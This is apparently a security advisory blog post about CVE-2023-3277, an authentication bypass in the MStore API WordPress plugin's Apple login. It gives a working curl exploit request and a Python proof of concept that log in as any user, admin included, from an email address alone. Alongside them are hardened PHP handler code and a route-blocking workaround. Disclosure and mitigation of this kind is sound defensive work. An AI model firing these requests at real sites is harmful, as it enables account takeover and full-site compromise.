CVE-2023-3277 - Critical Unauthorized Account Access and Privilege Escalation Vulnerability in MStore API WordPress Plugin
Summary:
A vulnerability (CVE-2023-3277) has been found in the popular MStore API WordPress plugin (versions up to and including 4.10.7). This flaw allows attackers to bypass authentication and gain unauthorized access to any WordPress user account — including admin accounts — simply by knowing the target’s email address. The root of the problem is in the flawed implementation of the "Apple login" feature. The plugin author has not issued a security patch, despite regular updates and a responsible disclosure 30 days ago. This post breaks down the issue, provides code insight, and offers mitigation guidance.
What is the MStore API Plugin?
MStore API is a widely-used WordPress plugin connecting native mobile apps like those built with InspireUI's MStore to WooCommerce stores. It enables user authentication, product browsing, orders, and more — making it a high-value target for attackers.
Vulnerability Details
Vulnerable Versions: Up to and including 4.10.7
Patched Version: _None as of publication_
CVE ID: CVE-2023-3277
Impact: Account takeover, privilege escalation, full-site compromise possible.
Root Cause: Apple Login Misimplementation
The plugin lets users sign in with "Sign in with Apple," but doesn't verify the authenticity of the Apple ID token received from the client. Instead, it just trusts whatever email the client supplies — no cryptographic validation at all.
Step 1: Gather a Target’s Email
All an attacker needs is the WordPress user’s email address. For WooCommerce shops, customer emails are often easy to guess or enumerate.
Step 2: Send a Fake Login Request
The attacker crafts a bogus Apple login API request with the victim's email. The server, failing to verify, creates a valid login session for that email.
Example Exploit Request
curl -X POST https://victim.com/wp-json/api/v1/applelogin \
  -H 'Content-Type: application/json' \
  -d '{
    "email": "admin@victim.com",
    "userName": "JohnDoe",
    "photo": "http://whatever.com/avatar.jpg",
    "appleToken": "any-string-or-empty"
  }'
That’s it! The server then logs the attacker in as the admin user (admin@victim.com) or any registered user they choose.
Full Exploit Chain
- No Apple account needed
- No token validation
- No password
- No additional checks
Proof-of-Concept (PoC): Python Example
Below is a basic Python script demonstrating the exploit.
import requests

# Target endpoint and the email of the account to log in as
URL = "https://victim.com/wp-json/api/v1/applelogin"
EMAIL = "admin@victim.com"

# The vulnerable plugin never validates "appleToken", so any string is accepted
data = {
    "email": EMAIL,
    "userName": "HackedByScript",
    "photo": "http://example.com/any.jpg",
    "appleToken": "fake",
}

response = requests.post(URL, json=data, timeout=10)
print("Status Code:", response.status_code)
print("Response:", response.text)
If successful, the response contains a login token or cookie, giving the attacker session access.
In the plugin’s PHP
// This is somewhere inside the MStore API plugin (simplified)
$email = sanitize_email($request->get_param('email')); // taken straight from the request body
$user  = get_user_by('email', $email);
if (!$user) {
    // create new user
    ...
    $user = get_user_by('email', $email);
}
wp_signon(array(
    'user_login'    => $user->user_login,
    'user_password' => null, // <-- Doesn't check password or real apple token!
    'remember'      => true
));
Notably, there is zero verification of the Apple token. The server trusts the client completely.
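For comparison, here is what a correct handler for this route has to do: verify the Apple identity token's signature against Apple's published keys, check its issuer, audience and expiry, and take the user's identity from the verified claims rather than from the request body. This is an added example written for this post, not MStore API code or a vendor patch. It assumes the firebase/php-jwt library is installed via Composer, that the site owner fills in EXAMPLE_APPLE_CLIENT_ID with the app's Apple client ID, that the "customer" role exists (WooCommerce), and that the example_ prefixed function names, the example/v1 namespace and the example_apple_sub user-meta key are placeholders.

```php
<?php
// Added example, not MStore API code. Assumes firebase/php-jwt via Composer and a
// site-specific EXAMPLE_APPLE_CLIENT_ID; example_* names and the meta key are placeholders.
require_once __DIR__ . '/vendor/autoload.php';

use Firebase\JWT\JWK;
use Firebase\JWT\JWT;

const EXAMPLE_APPLE_CLIENT_ID = 'com.example.mstore-app';          // assumed app client ID
const APPLE_ISSUER            = 'https://appleid.apple.com';
const APPLE_JWKS_URL          = 'https://appleid.apple.com/auth/keys';

/** Fetch Apple's public signing keys, cached for an hour with the WP transient API. */
function example_apple_jwks(): array {
    $jwks = get_transient('example_apple_jwks');
    if (!is_array($jwks)) {
        $resp = wp_remote_get(APPLE_JWKS_URL, ['timeout' => 5]);
        if (is_wp_error($resp) || wp_remote_retrieve_response_code($resp) !== 200) {
            return [];
        }
        $jwks = json_decode(wp_remote_retrieve_body($resp), true);
        if (!is_array($jwks) || empty($jwks['keys'])) {
            return [];
        }
        set_transient('example_apple_jwks', $jwks, HOUR_IN_SECONDS);
    }
    return $jwks;
}

/** Verify an Apple identity token: signature, exp/nbf/iat, issuer, audience, subject. */
function example_verify_apple_token(string $identity_token) {
    $jwks = example_apple_jwks();
    if (empty($jwks)) {
        return new WP_Error('apple_jwks_unavailable', 'Apple signing keys unavailable', ['status' => 503]);
    }
    try {
        JWT::$leeway = 30; // seconds of clock skew tolerated on the time claims
        // parseKeySet() pins every key to RS256, so "alg":"none" or HS256 tokens are rejected.
        $claims = JWT::decode($identity_token, JWK::parseKeySet($jwks, 'RS256'));
    } catch (\Throwable $e) {
        return new WP_Error('apple_token_invalid', 'Apple identity token rejected', ['status' => 401]);
    }
    $aud = (array) ($claims->aud ?? []); // aud may be a string or a list
    if (($claims->iss ?? '') !== APPLE_ISSUER
        || !in_array(EXAMPLE_APPLE_CLIENT_ID, $aud, true)
        || empty($claims->sub)) {
        return new WP_Error('apple_token_invalid', 'Apple identity token rejected', ['status' => 401]);
    }
    return $claims;
}

/** Hardened handler: the identity comes only from the verified token, never from "email". */
function example_apple_login(WP_REST_Request $request) {
    $claims = example_verify_apple_token((string) $request->get_param('appleToken'));
    if (is_wp_error($claims)) {
        return $claims;
    }
    // Prefer the stable Apple subject identifier stored on a previously linked account.
    $linked = get_users(['meta_key' => 'example_apple_sub', 'meta_value' => $claims->sub, 'number' => 1]);
    $user   = $linked ? $linked[0] : false;

    if (!$user) {
        // Fall back to the email inside the token, and only if Apple marked it verified
        // (Apple sends email_verified as boolean true or the string "true").
        $verified = filter_var($claims->email_verified ?? false, FILTER_VALIDATE_BOOLEAN);
        $email    = sanitize_email($claims->email ?? '');
        if (!$verified || !is_email($email)) {
            return new WP_Error('apple_email_unverified', 'No verified email in token', ['status' => 401]);
        }
        $user = get_user_by('email', $email);
        if (!$user) {
            $user_id = wp_insert_user([
                'user_login' => sanitize_user('apple_' . substr(hash('sha256', $claims->sub), 0, 16)),
                'user_email' => $email,
                'user_pass'  => wp_generate_password(32, true),
                'role'       => 'customer', // assumed WooCommerce role; never an elevated one
            ]);
            if (is_wp_error($user_id)) {
                return $user_id;
            }
            $user = get_user_by('id', $user_id);
        }
        update_user_meta($user->ID, 'example_apple_sub', $claims->sub);
    }
    wp_set_current_user($user->ID);
    wp_set_auth_cookie($user->ID, true);
    return ['user_id' => $user->ID, 'user_login' => $user->user_login];
}

add_action('rest_api_init', function () {
    register_rest_route('example/v1', '/applelogin', [
        'methods'             => 'POST',
        'callback'            => 'example_apple_login',
        'permission_callback' => '__return_true', // public endpoint; the token is the credential
    ]);
});
```

The two design points worth noting: the request body's "email" field is never read, so knowing a victim's address gains nothing, and accounts are linked by Apple's sub claim first, with email used only as a verified fallback, so a token for one Apple ID cannot be replayed to attach to someone else's account.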
- Personal Data Exposure: Exfiltrate user data, reset passwords, or escalate further.
- SEO Spam or Malware Hosting: With admin access, attackers can plant malicious plugins or spam content.
Temporary Workarounds
1. Disable Apple Login in MStore App: If you use MStore API, immediately disable the Apple login feature. Often you can change or comment out the related route in /wp-content/plugins/mstore-api code.
2. Block the API Route: Use a WAF/firewall or security plugin to block POST requests to /wp-json/api/v1/applelogin.
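If you cannot put a WAF in front of the site, the same route block can be done inside WordPress itself. The following is an added example for this post (not MStore API code): a must-use plugin that short-circuits any request to the vulnerable route before the plugin's callback runs and writes a log line so attempts show up in monitoring. It assumes the route path from the advisory (/wp-json/api/v1/applelogin, which the REST server sees as /api/v1/applelogin) and that the file is placed in wp-content/mu-plugins/.

```php
<?php
/**
 * Plugin Name: Block MStore API Apple login (temporary workaround)
 *
 * Added example, not part of MStore API. Save as wp-content/mu-plugins/block-applelogin.php;
 * mu-plugins load before ordinary plugins, so this runs regardless of plugin updates.
 */
add_filter('rest_pre_dispatch', function ($result, WP_REST_Server $server, WP_REST_Request $request) {
    // get_route() is relative to /wp-json, so the advisory's URL becomes /api/v1/applelogin.
    // All methods are blocked, not just POST, so method-override tricks do not reach the handler.
    if ($request->get_route() === '/api/v1/applelogin') {
        // Record who tried and which account they claimed; both are useful for detection.
        $ip    = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
        $email = sanitize_email((string) $request->get_param('email'));
        error_log(sprintf('[mstore-workaround] blocked %s %s from %s claiming %s',
            $request->get_method(), $request->get_route(), $ip, $email));

        // Returning a non-null value stops dispatch; a WP_Error becomes a 403 JSON response.
        return new WP_Error('rest_forbidden', 'Apple login is disabled on this site.', ['status' => 403]);
    }
    return $result; // null: let every other route proceed normally
}, 0, 3);
```

After installing it, a request like the one in the exploit section should return HTTP 403 with the rest_forbidden error body, and the PHP error log should carry one "[mstore-workaround] blocked" line per attempt; repeated lines from one IP naming different emails are the enumeration pattern this advisory describes.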
References
- WordPress Plugin Directory: MStore API
- Original Disclosure Report (if available)
- Understanding "Sign In with Apple" Security
- Improper Authentication Common Weakness
Summary
CVE-2023-3277 in MStore API lets attackers log in as any WordPress user simply by knowing their email, due to a broken Apple login process. Patch absent as of now — site owners running MStore API must take immediate defensive steps.
For more technical advice or assistance mitigating this vulnerability, leave a comment below or contact a trusted WordPress security provider.
Timeline
Published on: 11/03/2023 12:15:08 UTC
Last modified on: 11/13/2023 18:30:53 UTC